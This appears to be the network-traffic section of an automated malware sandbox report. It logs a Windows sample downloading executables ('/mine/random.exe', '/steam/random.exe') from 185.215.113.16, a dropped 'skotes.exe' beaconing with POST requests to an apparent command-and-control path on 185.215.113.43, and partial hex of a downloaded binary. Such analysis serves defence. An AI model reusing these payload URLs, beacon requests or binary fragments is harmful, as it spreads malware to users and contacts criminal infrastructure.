                                                                                                              Dec 31, 2024 09:49:56.882219076 CET5001680192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:49:56.882546902 CET5001780192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:49:56.887270927 CET8050016185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:49:56.887350082 CET8050017185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:49:56.887444019 CET5001680192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:49:56.887481928 CET5001780192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:49:56.887685061 CET5001780192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:49:56.892537117 CET8050017185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:49:57.603605032 CET8050017185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:49:57.603699923 CET5001780192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:49:59.225644112 CET5001780192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:49:59.226130962 CET5001880192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:49:59.230861902 CET8050017185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:49:59.230922937 CET8050018185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:49:59.230931044 CET5001780192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:49:59.231012106 CET5001880192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:49:59.231152058 CET5001880192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:49:59.235925913 CET8050018185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:49:59.931427956 CET8050018185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:49:59.931524038 CET5001880192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:01.446271896 CET5001880192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:01.446531057 CET5002080192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:01.451323986 CET8050018185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:01.451349974 CET8050020185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:01.451442003 CET5002080192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:01.451512098 CET5001880192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:01.451570988 CET5002080192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:01.456300020 CET8050020185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:03.455797911 CET8050020185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:03.455863953 CET5002080192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:05.088530064 CET5002080192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:05.089061022 CET5002180192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:05.094129086 CET8050020185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:05.094187021 CET5002080192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:05.095309973 CET8050021185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:05.095379114 CET5002180192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:05.095500946 CET5002180192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:05.101522923 CET8050021185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:05.803459883 CET8050021185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:05.803529978 CET5002180192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:07.322361946 CET5002180192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:07.322814941 CET5002280192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:07.327375889 CET8050021185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:07.327425003 CET5002180192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:07.327646017 CET8050022185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:07.327718973 CET5002280192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:07.328083038 CET5002280192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:07.332840919 CET8050022185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:08.025239944 CET8050022185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:08.025372982 CET5002280192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:09.672997952 CET5002280192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:09.673360109 CET5002380192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:09.678090096 CET8050022185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:09.678145885 CET5002280192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:09.678240061 CET8050023185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:09.678431988 CET5002380192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:09.679383993 CET5002380192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:09.684139013 CET8050023185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:10.413489103 CET8050023185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:10.413542032 CET5002380192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:11.931349993 CET5002380192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:11.931966066 CET5002480192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:11.936928988 CET8050023185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:11.936954975 CET8050024185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:11.936999083 CET5002380192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:11.937047958 CET5002480192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:11.937598944 CET5002480192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:11.942433119 CET8050024185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:12.654110909 CET8050024185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:12.654192924 CET5002480192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:14.275098085 CET5002480192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:14.275470018 CET5002580192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:14.280323029 CET8050025185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:14.280566931 CET5002580192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:14.280780077 CET5002580192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:14.282596111 CET8050024185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:14.282665014 CET5002480192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:14.285561085 CET8050025185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:14.313033104 CET5002580192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:15.862013102 CET5002680192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:15.866996050 CET8050026185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:15.867086887 CET5002680192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:15.867229939 CET5002680192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:15.872101068 CET8050026185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:17.101953983 CET8050026185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:17.102010965 CET5002680192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:18.730017900 CET5002680192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:18.730318069 CET5002780192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:18.735205889 CET8050027185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:18.735220909 CET8050026185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:18.735270977 CET5002780192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:18.735296965 CET5002680192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:18.735858917 CET5002780192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:18.740705013 CET8050027185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:19.435967922 CET8050027185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:19.436151028 CET5002780192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:20.947165012 CET5002780192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:20.947523117 CET5002880192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:20.952203989 CET8050027185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:20.952302933 CET8050028185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:20.952348948 CET5002780192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:20.952380896 CET5002880192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:20.952583075 CET5002880192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:20.957340956 CET8050028185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:23.037642956 CET8050028185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:23.037946939 CET5002880192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:24.665879965 CET5002880192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:24.666158915 CET5002980192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:24.670825005 CET8050028185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:24.670896053 CET5002880192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:24.670918941 CET8050029185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:24.671329021 CET5002980192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:24.671529055 CET5002980192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:24.676301003 CET8050029185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:26.071680069 CET8050029185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:26.071702003 CET8050029185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:26.071726084 CET5002980192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:26.071734905 CET8050029185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:26.071748018 CET5002980192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:26.071773052 CET5002980192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:27.592341900 CET5002980192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:27.592653990 CET5003080192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:27.597285986 CET8050029185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:27.597400904 CET8050030185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:27.597448111 CET5002980192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:27.597486019 CET5003080192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:27.598668098 CET5003080192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:27.603415012 CET8050030185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:28.307413101 CET8050030185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:28.307529926 CET5003080192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:29.936311960 CET5003080192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:29.936929941 CET5003180192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:29.941406012 CET8050030185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:29.941453934 CET5003080192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:29.941898108 CET8050031185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:29.941950083 CET5003180192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:29.942589045 CET5003180192.168.2.6185.215.113.43
                                                                                                              Dec 31, 2024 09:50:29.947385073 CET8050031185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:30.632594109 CET8050031185.215.113.43192.168.2.6
                                                                                                              Dec 31, 2024 09:50:30.635127068 CET5003180192.168.2.6185.215.113.43
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 31, 2024 09:48:27.818762064 CET4937153192.168.2.61.1.1.1
                                                                                                              Dec 31, 2024 09:48:27.831734896 CET53493711.1.1.1192.168.2.6
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Dec 31, 2024 09:48:27.818762064 CET192.168.2.61.1.1.10x3d8aStandard query (0)fancywaxxers.shopA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Dec 31, 2024 09:48:27.831734896 CET1.1.1.1192.168.2.60x3d8aNo error (0)fancywaxxers.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                                              Dec 31, 2024 09:48:27.831734896 CET1.1.1.1192.168.2.60x3d8aNo error (0)fancywaxxers.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                                              Dec 31, 2024 09:48:27.831734896 CET1.1.1.1192.168.2.60x3d8aNo error (0)fancywaxxers.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                                              Dec 31, 2024 09:48:27.831734896 CET1.1.1.1192.168.2.60x3d8aNo error (0)fancywaxxers.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                                              Dec 31, 2024 09:48:27.831734896 CET1.1.1.1192.168.2.60x3d8aNo error (0)fancywaxxers.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                                              Dec 31, 2024 09:48:27.831734896 CET1.1.1.1192.168.2.60x3d8aNo error (0)fancywaxxers.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                                              Dec 31, 2024 09:48:27.831734896 CET1.1.1.1192.168.2.60x3d8aNo error (0)fancywaxxers.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                                              • fancywaxxers.shop
                                                                                                              • 185.215.113.16
                                                                                                              • 185.215.113.43
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.649748185.215.113.16806248C:\Users\user\Desktop\Dl6wuWiQdg.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:48:39.130386114 CET205OUTGET /steam/random.exe HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Host: 185.215.113.16


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.649754185.215.113.16806248C:\Users\user\Desktop\Dl6wuWiQdg.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:48:39.780358076 CET204OUTGET /mine/random.exe HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Host: 185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.472445011 CET1236INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:48:39 GMT
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Content-Length: 3243520
                                                                                                              Last-Modified: Tue, 31 Dec 2024 08:37:28 GMT
                                                                                                              Connection: keep-alive
                                                                                                              ETag: "6773ad48-317e00"
                                                                                                              Accept-Ranges: bytes
                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 80 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf1@1~1@Wk4o1n1 @.rsrc@.idata @tezivoqu**@tcaewlrxp1X1@.taggant01"\1@
                                                                                                              Dec 31, 2024 09:48:40.472482920 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Dec 31, 2024 09:48:40.472491980 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Dec 31, 2024 09:48:40.472507954 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Dec 31, 2024 09:48:40.472518921 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Dec 31, 2024 09:48:40.472528934 CET672INData Raw: e5 62 b2 e7 96 82 97 25 7c ce 74 cc 7e e6 48 97 81 a2 f0 4f 6f 25 f6 e7 36 25 35 a3 80 4c cd cf 79 63 b2 e7 96 8e ee 25 7c ce 54 cc 7e e6 48 77 80 a2 f0 4f 4f 24 f6 e7 36 25 35 a3 80 4c e9 cf 71 63 b2 e7 96 32 e0 25 7c ce b4 cc 7e e6 48 57 80 a2
                                                                                                              Data Ascii: b%|t~HOo%6%5Lyc%|T~HwOO$6%5Lqc2%|~HWO$6%5Lec%|~H7O$6%5Lc%|~HO$6%5Lc%|~HO$6%5L9c%|4~HO/$6%5Lcr%|~H
                                                                                                              Dec 31, 2024 09:48:40.472538948 CET1236INData Raw: 5d 63 b2 e7 96 5a 97 25 7c ce d4 c8 7e e6 48 f7 a9 a2 f0 4f cf 26 f6 e7 36 25 35 a3 80 4c fd cf a5 63 b2 e7 96 52 e0 25 7c ce 34 c9 7e e6 48 d7 a9 a2 f0 4f 2f 26 f6 e7 36 25 35 a3 80 4c fd cf 4d 63 b2 e7 96 be ee 25 7c ce 14 c9 7e e6 48 b7 a8 a2
                                                                                                              Data Ascii: ]cZ%|~HO&6%5LcR%|4~HO/&6%5LMc%|~HO&6%5LUcB%|t~HOo&6%5L}`:%|T~HwOO6%5LA`n%|~HWO6%5Lq`%|~H7O6%5La`"%|~H
                                                                                                              Dec 31, 2024 09:48:40.472559929 CET1236INData Raw: 8f 1d f6 e7 36 25 35 a3 80 4c c1 cf 49 61 b2 e7 96 66 e2 25 7c ce f4 c5 7e e6 48 17 5e a2 f0 4f ef 1d f6 e7 36 25 35 a3 80 4c fd cf 45 6e b2 e7 96 56 ef 25 7c ce d4 fb 7e e6 48 f7 50 a2 f0 4f cf 1d f6 e7 36 25 35 a3 80 4c fd cf 6d 6e b2 e7 96 f2
                                                                                                              Data Ascii: 6%5LIaf%|~H^O6%5LEnV%|~HPO6%5Lmn%|4~HPO/6%5Lun%|~H_O6%5L1n%|t~HYOo6%5L%nz%|T~HwXOO6%5LnZ%|~HWXO6%5LUn
                                                                                                              Dec 31, 2024 09:48:40.472569942 CET1236INData Raw: 7c ce b4 c0 7e e6 48 57 4c a2 f0 4f af 10 f6 e7 36 25 35 a3 80 4c ed cf d5 6a b2 e7 96 02 8a 25 7c ce 94 c0 7e e6 48 37 4d a2 f0 4f 8f 10 f6 e7 36 25 35 a3 80 4c fd cf 8d 6a b2 e7 96 2a 8e 25 7c ce f4 c0 7e e6 48 17 4d a2 f0 4f ef 10 f6 e7 36 25
                                                                                                              Data Ascii: |~HWLO6%5Lj%|~H7MO6%5Lj*%|~HMO6%5Lj%|~HOO6%5Lj%|4~HOO/6%5L]jj%|~HNO6%5NR88*5NAR88*5N!R88*5LMj%|
                                                                                                              Dec 31, 2024 09:48:40.472580910 CET1236INData Raw: 80 b3 6b 43 26 d9 49 ff c6 a2 f0 fb 9e e6 f0 e7 7d b6 11 eb 1d a0 f0 92 ba b6 75 24 48 42 10 e7 7d e6 f0 6c 39 ee 3f 24 50 e6 f0 e7 7d b6 c8 fa ee e7 f0 a3 80 2a 35 a3 80 2a 35 a3 80 2a 35 a3 80 b3 6b 43 ff ca f5 6c 01 d2 c9 90 54 d9 24 cf 79 e6
                                                                                                              Data Ascii: kC&I}u$HB}l9?$P}*5*5*5kClT$y,7N}*5kC*m&,&j%x?bO"zR$|m?=1$*5*5*5kC*m&,&j%x?bO"z$|m?=1$*5*5*5bhP!!jm
                                                                                                              Dec 31, 2024 09:48:40.477416992 CET1236INData Raw: 70 b0 11 eb 1d a0 f0 92 ba b6 75 24 48 42 10 e7 7d e6 f0 6a 4d 6f a2 57 26 e6 48 ca fe a3 f0 6c 01 3e 6e d4 4d 21 b2 4f 7c e6 f0 e7 bc a3 d4 ed 7d e6 f0 a5 39 3e f1 4f cd b1 f1 e7 c2 a3 38 a6 39 da f1 e7 7d e6 80 5e c9 ea 6b ad 53 53 e9 4f 05 db
                                                                                                              Data Ascii: pu$HB}jMoW&Hl>nM!O|}9>O89}^kSSO$^aV8!'vY|k(Pe3'pPe0)}e=x:k,}=D>*5*5kC*mD06j&x?7-}!czbk%@oh;kx:=1$


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.649914185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:04.798247099 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s
                                                                                                              Dec 31, 2024 09:49:05.504883051 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:05 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.649930185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:07.028126001 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 160
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                              Dec 31, 2024 09:49:07.742714882 CET196INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:07 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.649946185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:09.371814966 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s
                                                                                                              Dec 31, 2024 09:49:10.169357061 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:10 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.649963185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:11.684186935 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 160
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
